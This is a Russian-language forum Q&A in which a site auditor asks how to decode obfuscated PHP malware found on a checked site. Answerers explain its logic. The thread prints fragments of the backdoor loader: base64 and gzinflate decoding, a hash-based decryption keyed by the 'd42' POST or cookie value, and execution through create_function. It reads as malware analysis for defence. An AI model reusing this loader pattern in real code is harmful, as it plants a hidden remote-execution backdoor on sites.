Как расшифровать вредоносный код base64_decode((str_replace(?

Question

[AKYLA]

Никак не могу расшифровать этот кусок кода, который был найден на проверяемом сайте.
Про переменные понятно, они просто разбиты на куски чтоб нельзя было найти по названию.
В итоге base64 это ($a10=base64_decode((str_replace("\n",'',')

В конце:

if($a10=gzinflate($a10)){
        if(isset(_POST['d42'])) setcookie('d42',_POST['d42']);
        $a10="".create_function((string)null,$a10);
        unset($k36);
        $a10();

Но вот получить результат из base64 никак не выходит, кроме белеберды, то ли это бинарник какой-то, то ли просто я не правильно что-то делаю. Кто хорошо разбирается в PHP, может поможет переделать код чтоб он выдал верный результат?

Полный код тут https://pastebin.com/tfZnLk6k

Answer 1

[Rsa97]

Не хватает данных. Алгоритм использует для дешифровки ключ, приходящий в $_POST['d42'] или $_COOKIE['d42'].

Answer 2

[Fenix957]

if($a10=gzinflate($a10)){
Здесь распаковывается сжатая строка и если результат удачный идет далее

if(isset(_POST['d42'])) setcookie('d42',_POST['d42']);

Здесь проверяется наличие пост параметра возможно используется гдето в дальнейшем. возможно авторизация или чтото еще

$a10="".create_function((string)null,$a10);
Переменная а10 становиться функцией. (string)null обозначает что у функции нет аргументов
$a10) код самой функции кторый был отправлен
unset($k36);
удаляется переменная
$a10();
Вызывается полезная нагрузка только что созданной функции

Answer 3

[Роман Мясников]

ну тут ещё не понятно что в переменной $k36, она судя по всему где-то ранее по коду инициализируется, а так тут да, вызов на выполнение того что будет в $a10.
я думаю тут сразу после if($a10=gzinflate($a10)){ надо смотреть что там в $a10 после декомпрессии.

У меня был похожий случай и таким г... были почти все скрипты побиты, но код ко всему самозаражение ещё устраивал.

Comments

[AKYLA]

$k36 формируется тут

$k36=isset(_POST['d42'])?_POST['d42']:(isset(_COOKIE['d42'])?_COOKIE['d42']:NULL);
if($k36!==NULL){
    $k36=md5($k36).mb_substr(sha1(f5($k36)),0,mb_strlen($k36)); # Получение хеша строки, переворот строки
    for($i=0;$i<11490;$i++){
        if(!isset($a10[$i])) break;
        $j=(ord(($a10[$i]))-ord(($k36[$i])))%256; #тут тоже какие-то манипуляции
        $a10[$i]=chr($j);
        $k36.=$a10[$i];
    }

Переворот строки $k36 и удаление нулей как я понял.

function f5($s){
    $i=0;
    $rev='';
    while(@$s[$i]) $i++;
    $i--;
    while(@$s[$i] && $i>=0){$rev.=@$s[$i--];}
    return $rev;
}